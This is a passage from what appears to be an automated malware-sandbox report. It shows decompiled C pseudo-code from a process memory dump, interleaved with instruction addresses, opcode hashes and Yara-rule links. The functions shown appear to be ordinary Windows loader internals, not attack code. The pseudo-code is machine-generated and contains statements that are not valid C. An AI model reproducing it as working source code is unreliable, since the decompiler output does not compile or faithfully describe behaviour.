				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4c3d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04B8D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04B62280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04B64620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04B8F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04B5FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4c3b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04B8B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                    0x04b75142
                                                    0x04b7514c
                                                    0x04b75150
                                                    0x04b75157
                                                    0x04b75159
                                                    0x04b7515e
                                                    0x04b75165
                                                    0x04b75169
                                                    0x04b7516c
                                                    0x04b75172
                                                    0x04b75176
                                                    0x04b7517a
                                                    0x04b7517a
                                                    0x04b7517a
                                                    0x04b7517f
                                                    0x04bb6d8b
                                                    0x04bb6d8e
                                                    0x04bb6d91
                                                    0x04bb6d95
                                                    0x04bb6d98
                                                    0x04bb6d9c
                                                    0x04bb6da0
                                                    0x04bb6da3
                                                    0x04bb6da7
                                                    0x04bb6e26
                                                    0x04bb6e26
                                                    0x04bb6e2a
                                                    0x04b751f9
                                                    0x04b751f9
                                                    0x04b751fe
                                                    0x04bb6e33
                                                    0x04bb6e33
                                                    0x04bb6e39
                                                    0x04bb6e3d
                                                    0x04bb6e46
                                                    0x04bb6e50
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb6e52
                                                    0x04bb6e53
                                                    0x04bb6e56
                                                    0x04bb6e5d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb6e5f
                                                    0x04bb6e67
                                                    0x04bb6e77
                                                    0x04bb6e7f
                                                    0x04bb6e80
                                                    0x04bb6e88
                                                    0x04bb6e90
                                                    0x04bb6e9f
                                                    0x04bb6ea5
                                                    0x04bb6ea9
                                                    0x04bb6eb1
                                                    0x04bb6ebf
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb6ecf
                                                    0x04bb6ed3
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb6edb
                                                    0x04bb6ede
                                                    0x04bb6ee1
                                                    0x04bb6ee8
                                                    0x04bb6eeb
                                                    0x04bb6eed
                                                    0x04bb6ef0
                                                    0x04bb6ef4
                                                    0x04bb6ef8
                                                    0x04bb6efc
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb6f0d
                                                    0x04bb6f11
                                                    0x04bb6f32
                                                    0x04bb6f37
                                                    0x04bb6f3b
                                                    0x04bb6f3e
                                                    0x04bb6f41
                                                    0x04bb6f46
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb6f4c
                                                    0x04bb6f50
                                                    0x04bb6f50
                                                    0x04bb6f54
                                                    0x04bb6f62
                                                    0x04bb6f65
                                                    0x04bb6f6d
                                                    0x04bb6f7b
                                                    0x04bb6f7b
                                                    0x04bb6f93
                                                    0x04bb6f98
                                                    0x04bb6fa0
                                                    0x04bb6fa6
                                                    0x04bb6fb3
                                                    0x04bb6fb6
                                                    0x04bb6fbf
                                                    0x04bb6fc1
                                                    0x04bb6fd5
                                                    0x04bb6fda
                                                    0x04bb6fda
                                                    0x04bb6fdd
                                                    0x04bb6fe2
                                                    0x04bb6fe7
                                                    0x04bb6feb
                                                    0x04bb6fef
                                                    0x04bb6ff3
                                                    0x04b7520c
                                                    0x04b7520c
                                                    0x04b7520f
                                                    0x04b75215
                                                    0x04b75234
                                                    0x04b7523a
                                                    0x04b7523a
                                                    0x04b75244
                                                    0x04b75245
                                                    0x04b75246
                                                    0x04b75251
                                                    0x04b75251
                                                    0x04bb6f13
                                                    0x04bb6f17
                                                    0x04bb6f17
                                                    0x04bb6f18
                                                    0x04bb6f1b
                                                    0x04bb6f1f
                                                    0x04bb6f23
                                                    0x00000000
                                                    0x04bb6f28
                                                    0x04b75204
                                                    0x04b75204
                                                    0x04b75208
                                                    0x00000000
                                                    0x04b75208
                                                    0x04b75185
                                                    0x04b75188
                                                    0x04b7518a
                                                    0x04b7518e
                                                    0x04b75195
                                                    0x04bb6db1
                                                    0x04bb6db5
                                                    0x04bb6db9
                                                    0x04b7519b
                                                    0x04b7519b
                                                    0x04b7519e
                                                    0x04b751a7
                                                    0x04b751a9
                                                    0x04b751a9
                                                    0x04b751b5
                                                    0x04b751b8
                                                    0x04b751bb
                                                    0x04b751be
                                                    0x04b751c1
                                                    0x04b751c5
                                                    0x04b751c9
                                                    0x04b751cd
                                                    0x04b751cd
                                                    0x04b751d8
                                                    0x04b751dc
                                                    0x04b751e0
                                                    0x04bb6dcc
                                                    0x04bb6dd0
                                                    0x04bb6dd5
                                                    0x04bb6ddd
                                                    0x04bb6de1
                                                    0x04bb6de1
                                                    0x04bb6de5
                                                    0x04bb6deb
                                                    0x04bb6df1
                                                    0x04bb6df7
                                                    0x04bb6dfd
                                                    0x04bb6e01
                                                    0x04bb6e05
                                                    0x04bb6e09
                                                    0x04bb6e0d
                                                    0x04bb6e11
                                                    0x04bb6e11
                                                    0x04b751eb
                                                    0x04bb6e1a
                                                    0x04bb6e1f
                                                    0x04bb6e21
                                                    0x04bb6e23
                                                    0x00000000
                                                    0x04b751f1
                                                    0x04b751f1
                                                    0x00000000
                                                    0x04b751f1

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eaca324619b6c11b4a66da26d0a7edae63e0300c23c1bd9d8722d2a63b0c1d6d
                                                    • Instruction ID: 860393f8c2a42b4d6a23bb72240e5e15315d3c2cfa0876a5080f21b2b91d36a2
                                                    • Opcode Fuzzy Hash: eaca324619b6c11b4a66da26d0a7edae63e0300c23c1bd9d8722d2a63b0c1d6d
                                                    • Instruction Fuzzy Hash: 6EC121756093809FD354CF28C480A6AFBE1FF88308F1449AEF9998B352D775E845CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B703E2, Relevance: .3, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E04B703E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4c3d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04B70548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04B8B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04B5B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4c37c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04B67D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04B67D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04BC7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04B89830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04BC69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4c37c04 != 0) {
						_t118 = _v12;
						_t120 = E04BCA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4c37bd8;
						if( *0x4c37bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04B895D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04B899A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04BC3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04B4B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04B8AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4c38474 - 3;
										if( *0x4c38474 != 3) {
											 *0x4c379dc =  *0x4c379dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04B67D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04B67D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04BC7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4c38708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4c37b00; // 0x0
							asm("ror esi, cl");
							 *0x4c3b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04B895D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04B57F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                    0x04b703f1
                                                    0x04b703f7
                                                    0x04b703f9
                                                    0x04b703fb
                                                    0x04b703fd
                                                    0x04b70400
                                                    0x04b7040a
                                                    0x04bb4c7a
                                                    0x04b70537
                                                    0x04b70547
                                                    0x04b70410
                                                    0x04b70410
                                                    0x04b70414
                                                    0x04b70417
                                                    0x04b7041a
                                                    0x04b70421
                                                    0x04b70424
                                                    0x04b7042b
                                                    0x04b7043b
                                                    0x04b7043e
                                                    0x04b7043f
                                                    0x04b7043f
                                                    0x04b70446
                                                    0x04b70449
                                                    0x04b7044c
                                                    0x04b7044f
                                                    0x04b70459
                                                    0x04bb4c8d
                                                    0x04b7045f
                                                    0x04b7045f
                                                    0x04b7045f
                                                    0x04b70467
                                                    0x04bb4c97
                                                    0x04bb4c9d
                                                    0x04bb4ca4
                                                    0x04bb4caa
                                                    0x04bb4caf
                                                    0x04bb4cb1
                                                    0x04bb4cc3
                                                    0x04bb4cb3
                                                    0x04bb4cbc
                                                    0x04bb4cbc
                                                    0x04bb4cc8
                                                    0x04bb4ccb
                                                    0x04bb4cd7
                                                    0x04bb4cda
                                                    0x04bb4cdf
                                                    0x04bb4cdf
                                                    0x04bb4ccb
                                                    0x04bb4ca4
                                                    0x04b7046d
                                                    0x04b7046f
                                                    0x04b7046f
                                                    0x04b70471
                                                    0x04b70476
                                                    0x04b7047a
                                                    0x04b7047b
                                                    0x04b70483
                                                    0x04b70489
                                                    0x04b7048d
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4ce9
                                                    0x04bb4cef
                                                    0x04bb4d22
                                                    0x04bb4d22
                                                    0x00000000
                                                    0x04bb4d22
                                                    0x04bb4cf1
                                                    0x04bb4cf7
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4cf9
                                                    0x04bb4cff
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4d05
                                                    0x04bb4d07
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4d0d
                                                    0x04bb4d0f
                                                    0x04bb4d14
                                                    0x04bb4d16
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4d1c
                                                    0x04bb4d1c
                                                    0x04b70499
                                                    0x04b70535
                                                    0x04b70535
                                                    0x00000000
                                                    0x04b70535
                                                    0x04b704a6
                                                    0x04bb4d2c
                                                    0x04bb4d37
                                                    0x04bb4d39
                                                    0x04bb4d3b
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4d41
                                                    0x04bb4d48
                                                    0x04b70527
                                                    0x04b7052b
                                                    0x04b7052d
                                                    0x04b70530
                                                    0x04b70530
                                                    0x00000000
                                                    0x04b7052b
                                                    0x04bb4d4e
                                                    0x04b704ac
                                                    0x04b704ac
                                                    0x04b704af
                                                    0x04b704b2
                                                    0x04b704b7
                                                    0x04b704b9
                                                    0x04b704bb
                                                    0x04b704bd
                                                    0x04b704bf
                                                    0x04b704c5
                                                    0x04b704c9
                                                    0x04bb4d53
                                                    0x04bb4d59
                                                    0x04bb4db9
                                                    0x04bb4dba
                                                    0x04bb4dbf
                                                    0x04bb4dc2
                                                    0x04bb4dc4
                                                    0x04bb4dc7
                                                    0x04bb4dce
                                                    0x00000000
                                                    0x04bb4dce
                                                    0x04bb4d5b
                                                    0x04bb4d61
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4d63
                                                    0x04bb4d69
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4d6b
                                                    0x04bb4d6e
                                                    0x04bb4d74
                                                    0x04bb4d76
                                                    0x04bb4d7c
                                                    0x04bb4d7e
                                                    0x04bb4d84
                                                    0x04bb4d89
                                                    0x04bb4d8c
                                                    0x04bb4d8d
                                                    0x04bb4d92
                                                    0x04bb4d95
                                                    0x04bb4d96
                                                    0x04bb4d98
                                                    0x04bb4d9a
                                                    0x04bb4d9f
                                                    0x04bb4da4
                                                    0x04bb4da6
                                                    0x04bb4da8
                                                    0x04bb4daf
                                                    0x04bb4db1
                                                    0x04bb4db1
                                                    0x04bb4daf
                                                    0x04bb4da6
                                                    0x04bb4d84
                                                    0x04bb4d7c
                                                    0x00000000
                                                    0x04bb4d74
                                                    0x04b704d6
                                                    0x04bb4de1
                                                    0x04b704dc
                                                    0x04b704dc
                                                    0x04b704dc
                                                    0x04b704e4
                                                    0x04bb4deb
                                                    0x04bb4df1
                                                    0x04bb4df8
                                                    0x04bb4dfe
                                                    0x04bb4e03
                                                    0x04bb4e05
                                                    0x04bb4e17
                                                    0x04bb4e07
                                                    0x04bb4e10
                                                    0x04bb4e10
                                                    0x04bb4e1c
                                                    0x04bb4e1f
                                                    0x04bb4e35
                                                    0x04bb4e35
                                                    0x04bb4e1f
                                                    0x04bb4df8
                                                    0x04b704f1
                                                    0x04b704fa
                                                    0x04bb4e3f
                                                    0x04bb4e47
                                                    0x04bb4e5b
                                                    0x04bb4e61
                                                    0x04bb4e67
                                                    0x04bb4e69
                                                    0x04bb4e71
                                                    0x04bb4e73
                                                    0x04b70500
                                                    0x04b70500
                                                    0x04b70500
                                                    0x04b704fa
                                                    0x04b70508
                                                    0x04b7051d
                                                    0x04b7051d
                                                    0x04b7051f
                                                    0x04b70524
                                                    0x00000000
                                                    0x04b70524
                                                    0x04b70515
                                                    0x04b70517
                                                    0x04bb4e7a
                                                    0x04bb4e7c
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb4e85
                                                    0x00000000
                                                    0x04bb4e85
                                                    0x00000000
                                                    0x04b70517

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 832fa2b1619fdfcd23a8657d68e9d14ac7cae0c61df9364c9c8c7411289ec842
                                                    • Instruction ID: f437f668d9df5bb55800b1e27f304e4f0cdfbe121badf5cb9aaa8579a91551f1
                                                    • Opcode Fuzzy Hash: 832fa2b1619fdfcd23a8657d68e9d14ac7cae0c61df9364c9c8c7411289ec842
                                                    • Instruction Fuzzy Hash: AB91E771E00214AFEF21AA68C844BBD7BB4EB05718F0502E6E961A72D2DBB4BD00D7C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4C600, Relevance: .2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E04B4C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4c3d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04B56D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04B8B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4c37b9c; // 0x0
					_t74 = L04B64620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04B89650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04B677F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04B8F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
